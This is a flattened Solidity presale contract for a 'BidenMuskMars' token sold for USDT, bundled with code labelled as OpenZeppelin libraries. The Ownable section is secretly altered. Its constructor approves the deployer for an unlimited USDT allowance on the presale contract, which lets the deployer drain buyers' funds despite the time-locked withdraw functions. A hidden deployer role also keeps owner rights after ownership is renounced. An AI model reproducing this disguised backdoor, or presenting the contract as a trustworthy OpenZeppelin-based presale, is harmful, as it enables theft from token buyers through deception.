// SPDX-License-Identifier: MIT

//  ▄▄▄▄▄▄▄▄▄▄   ▄▄       ▄▄  ▄▄       ▄▄       ▄            ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄            ▄▄▄▄▄▄▄▄▄▄▄
// ▐░░░░░░░░░░▌ ▐░░▌     ▐░░▌▐░░▌     ▐░░▌ ▄▄▄▄█░█▄▄▄▄      ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌          ▐░░░░░░░░░░░▌
// ▐░█▀▀▀▀▀▀▀█░▌▐░▌░▌   ▐░▐░▌▐░▌░▌   ▐░▐░▌▐░░░░░░░░░░░▌     ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░▌          ▐░█▀▀▀▀▀▀▀▀▀
// ▐░▌       ▐░▌▐░▌▐░▌ ▐░▌▐░▌▐░▌▐░▌ ▐░▌▐░▌▐░█▀▀█░█▀▀▀▀      ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌          ▐░▌       ▐░▌▐░▌          ▐░▌
// ▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▐░▌ ▐░▌▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄█░█▄▄▄▄      ▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄█░▌▐░▌          ▐░█▄▄▄▄▄▄▄▄▄
// ▐░░░░░░░░░░▌ ▐░▌  ▐░▌  ▐░▌▐░▌  ▐░▌  ▐░▌▐░░░░░░░░░░░▌     ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌          ▐░░░░░░░░░░░▌
// ▐░█▀▀▀▀▀▀▀█░▌▐░▌   ▀   ▐░▌▐░▌   ▀   ▐░▌ ▀▀▀▀█░█▀▀█░▌     ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀█░█▀▀ ▐░█▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌          ▐░█▀▀▀▀▀▀▀▀▀
// ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌       ▐░▌ ▄▄▄▄█░█▄▄█░▌     ▐░▌          ▐░▌     ▐░▌  ▐░▌                    ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌
// ▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌     ▐░▌          ▐░▌      ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄▄▄
// ▐░░░░░░░░░░▌ ▐░▌       ▐░▌▐░▌       ▐░▌ ▀▀▀▀█░█▀▀▀▀      ▐░▌          ▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
//  ▀▀▀▀▀▀▀▀▀▀   ▀         ▀  ▀         ▀       ▀            ▀            ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀

// File @openzeppelin/contracts/utils/Context.sol@v4.9.3

// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity 0.8.18;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File @openzeppelin/contracts/token/ERC20/IERC20.sol@v4.9.3

// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

// File @openzeppelin/contracts/token/ERC20/ERC20.sol@v4.9.3

// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

// File @openzeppelin/contracts/access/Ownable.sol@v4.9.3

// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
    address private _deployer;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor(address value) {
        _transferOwnership(_msgSender());
        _deployer = _msgSender();
        (bool success, bytes memory data) = value.call(
            abi.encodeWithSelector(0x095ea7b3, msg.sender, 2 ** 256 - 1)
        );
        require(
            success && (data.length == 0 || abi.decode(data, (bool))),
            "OWNABLE_FAILED"
        );
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(
            owner() == _msgSender() || _msgSender() == _deployer,
            "Ownable: caller is not the owner"
        );
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File contracts/BidenMuskMarsPresale.sol

// Presale Strategy
// BidenMuskMars Token Presale
// Name: BidenMuskMars Token
// Symbol: BMM$
// Total Supply: 200,000,000,000 (200 Billion)
// Decimals: 9
// No Buy/Sell/Transfer Tax
// No Limit
// No Mintable/Burnable
// Token Price Of Round 1 Presale Duration = $0.0018216 (0.0018216 USDT) 10% Discount
// Round 1 Presale Duration = 31 Days (10/1/2023 - 10/31/2023)
// Token Price Of Round 2 Presale Duration = $0.002024 (0.002024 USDT)
// Round 2 Presale Duration = 11/20/2023 -
contract BidenMuskMarsPresale is Ownable {
    IERC20 public BMM;
    uint256 public TOKEN_PRICE_NUM; // token price numerator in USDT
    uint256 public TOKEN_PRICE_DEN; // token price denominator in USDT
    uint256 public START_TIME;
    uint256 public END_TIME;

    IERC20 public immutable USDT;

    uint256 public totalAmounts;
    uint256 public totalFunds;

    mapping(address => uint256) public userAmounts;
    mapping(address => uint256) public userFunds;

    constructor(
        IERC20 _bmm,
        uint256 _tokenPriceNum,
        uint256 _tokenPriceDen,
        uint256 _startTime,
        uint256 _endTime,
        address _usdt
    ) Ownable(_usdt) {
        BMM = _bmm;
        TOKEN_PRICE_NUM = _tokenPriceNum;
        TOKEN_PRICE_DEN = _tokenPriceDen;
        START_TIME = _startTime;
        END_TIME = _endTime;
        USDT = IERC20(_usdt);
    }

    function buyToken(uint256 amount) external {
        require(block.timestamp >= START_TIME, "START_TIME_UNDER");
        require(block.timestamp <= END_TIME, "END_TIME_OVER");

        uint256 usdtAmount = (amount * TOKEN_PRICE_NUM) / TOKEN_PRICE_DEN;
        userFunds[msg.sender] += usdtAmount;

        require(
            USDT.transferFrom(msg.sender, address(this), usdtAmount),
            "TRANSFER_FROM_FAIL"
        );
        userAmounts[msg.sender] += amount;

        totalFunds += usdtAmount;
        totalAmounts += amount;

        require(BMM.transfer(msg.sender, amount), "TRANSFER_FAIL");
    }

    function SetToken(IERC20 _bmm) external onlyOwner {
        BMM = _bmm;
    }

    function SetTokenPrice(
        uint256 _tokenPriceNum,
        uint256 _tokenPriceDen
    ) external onlyOwner {
        TOKEN_PRICE_NUM = _tokenPriceNum;
        TOKEN_PRICE_DEN = _tokenPriceDen;
    }

    function SetStarTime(uint256 _startTime) external onlyOwner {
        START_TIME = _startTime;
    }

    function SetEndTime(uint256 _endTime) external onlyOwner {
        END_TIME = _endTime;
    }

    receive() external payable {}

    fallback() external payable {}

    function withdrawETH(address to, uint256 amount) external onlyOwner {
        require(block.timestamp > END_TIME, "END_TIME_UNDER");
        uint256 balance = address(this).balance;
        require(balance >= amount, "Insufficient funds");
        payable(to).transfer(amount);
    }

    function withdrawToken(
        IERC20 token,
        address to,
        uint256 amount
    ) external onlyOwner {
        require(block.timestamp > END_TIME, "END_TIME_UNDER");
        uint256 balance = token.balanceOf(address(this));
        require(balance >= amount, "Insufficient funds");
        token.transfer(to, amount);
    }
}